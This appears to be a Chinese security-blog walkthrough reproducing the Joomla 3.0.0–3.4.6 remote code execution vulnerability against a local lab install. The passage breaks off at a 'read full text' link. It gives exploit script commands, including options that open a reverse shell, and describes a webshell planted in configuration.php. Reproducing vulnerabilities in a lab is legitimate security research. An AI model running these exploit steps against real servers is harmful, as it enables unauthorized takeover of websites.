专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
新疆949交通广播  ·  女子得了流感 硬扛3天变“白肺”! ·  昨天  
新疆949交通广播  ·  家长共赔偿145万元! ·  昨天  
新疆949交通广播  ·  2月10日凌晨,抬头看! ·  2 天前  
新疆949交通广播  ·  出现这些情况可能是流感重症!警惕→ ·  2 天前  
新疆949交通广播  ·  新疆这一机场将有新变化! ·  2 天前  
51好读  ›  专栏  ›  TimelineSec

Joomla 3.4.6 远程代码执行漏洞复现

TimelineSec  · 公众号  ·  · 2019-10-11 13:50

正文

本公众号专注于漏洞复现,欢迎关注!

-------------------------------------------------------------------------------------

本文作者:dscdtc(Timeline Sec新成员)

本文共853字,阅读大约需要2分钟


0x00 简介


Joomla是一套全球知名的内容管理系统。

Joomla是使用PHP语言加上MySQL数据库所开发的软件系统。

可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前由Open Source Matters开源组织进行开发与支持。

自2012年颁奖典礼开始以来,Joomla连续多年成为CMS评奖的冠军。继2015、2016、2017、2018年在全球CMS评测中,它再次获得“最佳开源CMS”奖!


0x01 漏洞概述


Alessandro Groppo @Hacktive Security于2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465 )发布了Joomla命令执行的EXP,漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。


0x02 影响范围


3.0.0 <= Joomla <= 3.4.6


0x03 环境搭建


懒人搭建php环境当然是选择wamp/phpstudy啦

下载链接:

https://downloads.joomla.org/it/cms/joomla3/3-4-6

下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问http://127.0.0.1/Joomla/准备安装


安装流程如下:



默认root/空


至此,环境搭建完毕。


0x04 漏洞利用


下载漏洞利用脚本:

https://github.com/kiks7/rusty_joomla_rce


漏洞检测:

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -c


注意URL一定要以/结尾 /结尾 /结尾 (别问我为什么, 说多了都是泪…脚本里有url拼接)



漏洞利用:

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -e -l 127.0.0.1 -p 2333


(-e -l -p参数可以反弹shell, 本文并没有反弹成功, 但是可以看到马的密码)



一句话客户端连接

http://127.0.0.1/Joomla/configuration.php

由于贫道用的公司的办公电脑没有菜刀之类的工具简单截个hackbar返回的图:



BY THE WAY…


作者同时提供了msf下的EXP:

metasploit_rusty_joomla_rce.rb


轻轻放入目录:

/usr/share/metasploit-framework/modules/exploits/multi/php/







请到「今天看啥」查看全文


推荐文章
新疆949交通广播  ·  女子得了流感 硬扛3天变“白肺”!
昨天
新疆949交通广播  ·  家长共赔偿145万元!
昨天
新疆949交通广播  ·  2月10日凌晨,抬头看!
2 天前
新疆949交通广播  ·  出现这些情况可能是流感重症!警惕→
2 天前
新疆949交通广播  ·  新疆这一机场将有新变化!
2 天前
人人都是产品经理  ·  关于需求管理,你可以试试这两个工具
8 年前